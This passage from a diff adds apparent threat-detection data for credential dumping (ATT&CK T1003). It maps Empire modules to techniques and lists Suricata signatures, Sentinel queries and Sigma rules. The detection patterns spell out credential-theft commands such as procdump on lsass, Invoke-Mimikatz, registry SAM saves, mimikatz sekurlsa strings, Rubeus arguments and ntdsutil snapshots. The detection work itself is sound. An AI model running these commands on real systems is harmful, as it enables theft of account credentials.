"ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/logonpasswords\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/lsadump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/lsadump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/mimitokens", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/mimitokens\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/sam", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/sam\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/silver_ticket", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "T1097", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/silver_ticket\": [\"T1003\",\"T1097\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/trust_keys", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/trust_keys\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/powerdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/powerdump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/vault_credential", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/vault_credential\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/management/downgrade_account", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/management/downgrade_account\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/management/wdigest_downgrade", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/management/wdigest_downgrade\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/privesc/gpp", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/privesc/gpp\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/privesc/mcafee_sitelist", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/privesc/mcafee_sitelist\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/linux/hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/linux/hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/linux/mimipenguin", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/linux/mimipenguin\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/osx/hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/osx/hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/collection/osx/kerberosdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/collection/osx/kerberosdump\": [\"T1003\"]," + }, + { + "Empire Module": "python/management/multi/kerberos_inject", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/management/multi/kerberos_inject\": [\"T1003\"]," + }, + { + "Empire Module": "python/situational_awareness/network/dcos/etcd_crawler", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/dcos/etcd_crawler\": [\"T1003\"]," + }, + { + "Rules": "ET Open", + "SID": "2027435", + "Signature": "ET ATTACK\\_RESPONSE Windows 64bit procdump Dump File Exfiltration", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2027436", + "Signature": "ET ATTACK\\_RESPONSE Windows 32bit procdump Dump File Exfiltration", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029330", + "Signature": "ET MALWARE Mimikatz x86 Executable Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029331", + "Signature": "ET MALWARE Mimikatz x64 Executable Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029332", + "Signature": "ET MALWARE Mimikatz x86 Mimidrv.sys File Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029333", + "Signature": "ET MALWARE Mimikatz x64 Mimidrv.sys File Transfer Over SMB", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029334", + "Signature": "ET MALWARE Mimikatz x86 Executable Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029335", + "Signature": "ET MALWARE Mimikatz x64 Executable Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029336", + "Signature": "ET MALWARE Mimikatz x86 Mimidrv.sys Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2029337", + "Signature": "ET MALWARE Mimikatz x64 Mimidrv.sys Download Over HTTP", + "Verified": "NO" + }, + { + "Rules": "ET Open", + "SID": "2010783", + "Signature": "ET EXPLOIT GsecDump executed", + "Verified": "NO" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 7and (module_loaded contains \"C:\\\\Windows\\\\System32\\\\samlib.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\WinSCard.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\cryptdll.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\hid.dll\"or module_loaded contains \"C:\\\\Windows\\\\System32\\\\vaultcli.dll\")and (process_path !contains \"\\\\Sysmon.exe\"or process_path !contains \"\\\\svchost.exe\"or process_path !contains \"\\\\logonui.exe\")", + "name": "Credential Dumping ImageLoad" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"Invoke-Mimikatz -DumpCreds\"or process_command_line contains \"gsecdump -a\"or process_command_line contains \"wce -o\"or process_command_line contains \"procdump -ma lsass.exe\"or process_command_line contains \"ntdsutil*ac i ntds*ifm*create full\")", + "name": "Credential Dumping Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 10 and target_process_path contains \"C:\\\\Windows\\\\system32\\\\lsass.exe\"and (process_granted_access contains \"0x1010\"or process_granted_access contains \"0x1410\"or process_granted_access contains \"0x147a\"or process_granted_access contains \"0x143a\")and process_call_trace contains \"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"and process_call_trace contains \"C:\\\\Windows\\\\system32\\\\KERNELBASE.dll\"and process_call_trace contains \"|UNKNOWN(*)\"", + "name": "Credential Dumping Process Access" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and process_path !contains \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\"and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Authentication\\\\Credential Provider\\\\\"or registry_key_path contains \"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\\"or registry_key_path contains \"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SecurityProviders\\\\\"or registry_key_path contains \"\\\\Control\\\\SecurityProviders\\\\WDigest\\\\\")and registry_key_path !contains \"\\\\Lsa\\\\RestrictRemoteSamEventThrottlingWindow\"", + "name": "Credential Dumping Registry" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"reg.exe\"and (process_command_line contains \"*save*HKLM\\\\sam*\"or process_command_line contains \"*save*HKLM\\\\system*\")", + "name": "Credential Dumping Registry Save" + }, + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Windows 64bit procdump Dump File Exfiltration", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Windows 32bit procdump Dump File Exfiltration", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Executable Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Executable Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Mimidrv.sys File Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Mimidrv.sys File Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Executable Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Executable Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Mimidrv.sys Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Mimidrv.sys Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET EXPLOIT GsecDump executed", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Judgement Panda Exfil Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "references": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "author": "Florian Roth", + "date": "2019/02/21", + "tags": [ + "attack.credential_access", + "attack.t1081", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": "*\\xcopy.exe", + "CommandLine": "* /S /E /C /Q /H \\\\*" + }, + "selection2": { + "Image": "*\\adexplorer.exe", + "CommandLine": "* -snapshot \"\" c:\\users\\\\*" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Antivirus Password Dumper Detection", + "id": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "date": "2018/09/09", + "modified": "2019/10/04", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "*DumpCreds*", + "*Mimikatz*", + "*PWCrack*", + "HTool/WCE", + "*PSWtool*", + "*PWDump*", + "*SecurityTool*", + "*PShlSpy*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Detection of SafetyKatz", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "experimental", + "description": "Detects possible SafetyKatz Behaviour", + "references": [ + "https://github.com/GhostPack/SafetyKatz" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "author": "Markus Neis", + "date": "2018/07/24", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": "*\\Temp\\debug.bin" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using procdump or taskmgr based on the CallTrace pointing to dbghelp.dll or dbgcore.dll for win10", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html" + ], + "tags": [ + "attack.t1003", + "attack.s0002", + "attack.credential_access" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "GrantedAccess": "0x1fffff", + "CallTrace": [ + "*dbghelp.dll*", + "*dbgcore.dll*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Mimikatz Detection LSASS Access", + "id": "0d894093-71bc-43c3-8c4d-ecfc28dcf5d9", + "status": "experimental", + "description": "Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION \"only old versions\", 0x0010 PROCESS_VM_READ)", + "references": [ + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html" + ], + "tags": [ + "attack.t1003", + "attack.s0002", + "attack.credential_access", + "car.2019-04-004" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "GrantedAccess": [ + "0x1410", + "0x1010" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Mimikatz In-Memory", + "id": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "status": "experimental", + "description": "Detects certain DLL loads when Mimikatz gets executed", + "references": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selector": { + "EventID": 7, + "Image": "C:\\Windows\\System32\\rundll32.exe" + }, + "dllload1": { + "ImageLoaded": "*\\vaultcli.dll" + }, + "dllload2": { + "ImageLoaded": "*\\wlanapi.dll" + }, + "exclusion": { + "ImageLoaded": [ + "ntdsapi.dll", + "netapi32.dll", + "imm32.dll", + "samlib.dll", + "combase.dll", + "srvcli.dll", + "shcore.dll", + "ntasn1.dll", + "cryptdll.dll", + "logoncli.dll" + ] + }, + "timeframe": "30s", + "condition": "selector | near dllload1 and dllload2 and not exclusion" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm" + ], + "status": "stable", + "author": "Thomas Patzke", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "TargetImage": "C:\\Windows\\System32\\lsass.exe", + "StartModule": null + }, + "condition": "selection" + }, + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "status": "experimental", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm" + ], + "author": "Florian Roth", + "date": "2018/02/10", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "level": "critical", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": "*\\AppData\\Local\\Temp\\SAM-*.dmp*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "description": "Detects Access to LSASS Process", + "status": "experimental", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter" + ], + "author": "Markus Neis", + "date": "2018/08/26", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows_defender", + "definition": "Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)" + }, + "detection": { + "selection": { + "EventID": 1121, + "Path": "*\\lsass.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "level": "high" + }, + { + "title": "Mimikatz Use", + "id": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "author": "Florian Roth", + "date": "2017/01/10", + "modified": "2019/10/11", + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004" + ], + "logsource": { + "product": "windows" + }, + "detection": { + "keywords": { + "Message": [ + "* mimikatz *", + "* mimilib *", + "* <3 eo.oe *", + "* eo.oe.kiwi *", + "* privilege::debug *", + "* sekurlsa::logonpasswords *", + "* lsadump::sam *", + "* mimidrv.sys *", + "* p::d *", + "* s::l *" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Naughty administrators", + "Penetration test" + ], + "level": "critical" + }, + { + "title": "Cmdkey Cached Credentials Recon", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials", + "references": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx" + ], + "author": "jmallette", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\cmdkey.exe", + "CommandLine": "* /list *" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "User" + ], + "falsepositives": [ + "Legitimate administrative tasks." + ], + "level": "low" + }, + { + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "description": "Detects Mimikatz DC sync security events", + "status": "experimental", + "date": "2018/06/03", + "modified": "2019/10/08", + "author": "Benjamin Delpy, Florian Roth", + "references": [ + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4662, + "Properties": [ + "*Replicating Directory Changes All*", + "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*" + ] + }, + "filter1": { + "SubjectDomainName": "Window Manager" + }, + "filter2": { + "SubjectUserName": [ + "NT AUTHORITY*", + "*$" + ] + }, + "condition": "selection and not filter1 and not filter2" + }, + "falsepositives": [ + "Valid DC Sync that is not covered by the filters; please report" + ], + "level": "high" + }, + { + "title": "Rubeus Hack Tool", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "description": "Detects command line parameters used by Rubeus hack tool", + "author": "Florian Roth", + "references": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/" + ], + "date": "2018/12/19", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* asreproast *", + "* dump /service:krbtgt *", + "* kerberoast *", + "* createnetonly /program:*", + "* ptt /ticket:*", + "* /impersonateuser:*", + "* renew /ticket:*", + "* asktgt /user:*", + "* harvest /interval:*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unlikely" + ], + "level": "critical" + }, + { + "title": "Possible Impacket SecretDump remote activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\ADMIN$", + "RelativeTargetName": "SYSTEM32\\\\*.tmp" + }, + "condition": "selection" + }, + "falsepositives": [ + "pentesting" + ], + "level": "high" + }, + { + "action": "global", + "title": "Malicious Service Install", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "description": "This method detects well-known keywords of malicious services in the Windows System Eventlog", + "author": "Florian Roth", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection1": { + "EventID": [ + 7045 + ] + }, + "keywords": { + "Message": [ + "*WCE SERVICE*", + "*WCESERVICE*", + "*DumpSvc*" + ] + }, + "quarkspwdump": { + "EventID": 16, + "HiveName": "*\\AppData\\Local\\Temp\\SAM*.dmp" + }, + "condition": "( selection1 and keywords ) or ( selection2 and keywords ) or quarkspwdump" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection2": { + "EventID": 4697 + } + } + }, + { + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "experimental", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", + "references": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4656, + 4658, + 4660, + 4663 + ], + "ObjectName": "*\\wceaux.dll" + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "critical" + }, + { + "title": "NotPetya Ransomware Activity", + "id": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "status": "experimental", + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "author": "Florian Roth, Tom Ueltschi", + "references": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.credential_access", + "attack.defense_evasion", + "attack.t1085", + "attack.t1070", + "attack.t1003", + "car.2016-04-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "pipe_com": { + "CommandLine": "*\\AppData\\Local\\Temp\\\\* \\\\.\\pipe\\\\*" + }, + "rundll32_dash1": { + "Image": "*\\rundll32.exe", + "CommandLine": "*.dat,#1" + }, + "perfc_keyword": [ + "*\\perfc.dat*" + ], + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Admin activity" + ], + "level": "critical" + }, + { + "title": "Process dump via comsvcs DLL", + "id": "09e6d5c0-05b8-4ff8-9eeb-043046ec774c", + "status": "experimental", + "description": "Detects process memory dump via comsvcs.dll and rundll32", + "references": [ + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817" + ], + "author": "Modexp (idea)", + "date": "2019/09/02", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "rundll_image": { + "Image": "*\\rundll32.exe" + }, + "rundll_ofn": { + "OriginalFileName": "RUNDLL32.EXE" + }, + "selection": { + "CommandLine": [ + "*comsvcs*MiniDump*full*", + "*comsvcs*MiniDumpW*full*" + ] + }, + "condition": "(rundll_image or rundll_ofn) and selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "status": "experimental", + "references": [ + "https://twitter.com/jackcr/status/807385668833968128" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4656, + "ProcessName": "C:\\Windows\\System32\\lsass.exe", + "AccessMask": "0x705", + "ObjectType": "SAM_DOMAIN" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "status": "experimental", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm" + ], + "author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\ntdsutil*" + }, + "condition": "selection" + }, + "falsepositives": [ + "NTDS maintenance" + ], + "level": "high" + }, + { + "title": "Suspicious Use of Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "status": "experimental", + "references": [ + "Internal Research" + ], + "author": "Florian Roth", + "date": "2018/10/30", + "modified": "2019/10/14", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003", + "car.2013-05-009" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "* -ma *" + ] + }, + "selection2": { + "CommandLine": [ + "* lsass*" + ] + }, + "selection3": { + "CommandLine": [ + "* -ma ls*" + ] + }, + "condition": "( selection1 and selection2 ) or selection3" + }, + "falsepositives": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "level": "medium" + }, + { + "title": "SAM Dump to AppData", + "id": "839dd1e8-eda8-4834-8145-01beeee33acd", + "status": "experimental", + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "system", + "definition": "The source of this type of event is Kernel-General" + }, + "detection": { + "selection": { + "EventID": 16 + }, + "keywords": { + "Message": [ + "*\\AppData\\Local\\Temp\\SAM-*.dmp *" + ] + }, + "condition": "all of them" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "high" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "experimental", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "references": [ + "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100" + ], + "author": "Markus Neis", + "date": "2018/04/09", + "modified": "2018/12/11", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\SYSVOL\\\\*\\policies\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "administrative activity" + ], + "level": "medium" + }, + { + "title": "Activity Related to NTDS.dit Domain Hash Retrieval", + "id": "b932b60f-fdda-4d53-8eda-a170c1d97bbd", + "status": "experimental", + "description": "Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely", + "author": "Florian Roth, Michael Haag", + "references": [ + "https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/", + "https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" 